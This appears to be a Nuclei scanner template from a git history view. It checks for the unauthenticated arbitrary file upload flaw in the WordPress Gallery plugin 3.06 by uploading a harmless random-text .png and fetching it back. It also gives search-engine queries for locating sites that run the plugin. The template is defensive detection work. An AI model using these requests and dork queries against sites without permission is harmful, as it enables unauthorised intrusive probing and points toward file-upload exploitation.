nuclei-templates/http/vulnerabilities/wordpress/wp-gallery-file-upload.yaml

52 lines
1.9 KiB
YAML
Raw Normal View History

2023-10-17 07:20:28 +00:00
id: wp-gallery-file-upload
info:
2023-10-17 13:27:49 +00:00
name: WordPress Plugin Gallery 3.06 - Arbitrary File Upload
2023-10-17 07:20:28 +00:00
author: r3Y3r53
severity: high
description: |
The Gallery by BestWebSoft WordPress plugin was affected by an Unauthenticated File Upload PHP Code Execution security vulnerability.
remediation: Fixed in version 3.1.1
2023-10-17 13:27:49 +00:00
reference:
- https://www.exploit-db.com/exploits/18998
- http://wordpress.org/extend/plugins/gallery-plugin/
- http://downloads.wordpress.org/plugin/gallery-plugin.3.06.zip
- https://wpscan.com/vulnerability/049c8518-1f52-4aa4-b0b3-218289727353
classification:
cpe: cpe:2.3:a:bestwebsoft:gallery:*:*:*:*:wordpress:*:*:*
2023-10-17 07:20:28 +00:00
metadata:
verified: true
max-request: 2
publicwww-query: /wp-content/plugins/gallery-plugin/
2023-10-17 07:20:28 +00:00
google-query: inurl:/wp-content/plugins/gallery-plugin/
2024-09-10 08:22:50 +00:00
product: gallery
vendor: bestwebsoft
2023-10-17 07:20:28 +00:00
tags: wp,wp-plugin,wordpress,wpscan,file-upload,intrusive
2023-10-17 07:20:28 +00:00
variables:
filename: "{{to_lower(rand_text_alpha(5))}}"
http:
- raw:
- |
POST /wp-content/plugins/gallery-plugin/upload/php.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=WebKitFormBoundary20kgW2hEKYaeF5iP
--WebKitFormBoundary20kgW2hEKYaeF5iP
Content-Disposition: form-data; name="qqfile"; filename="{{filename}}.png"
{{randstr}}
--WebKitFormBoundary20kgW2hEKYaeF5iP--
- |
GET /wp-content/plugins/gallery-plugin/upload/files/{{filename}}.png HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(content_type_1, "text/html") && contains(content_type_2, "image/png")'
- 'contains(body_1, "success:true") && contains(body_2, "{{randstr}}")'
condition: and
2024-09-12 05:14:01 +00:00
# digest: 4a0a00473045022039f54165232148b249749d4e0f28961d030934a3579d20a7267ae3f9d1daf48b022100df2209f9b81a3ae94ff0fffd24bde6cb043dfd4bfdf3a02dce18e37461dd2760:922c64590222798bb761d5b6d8e72950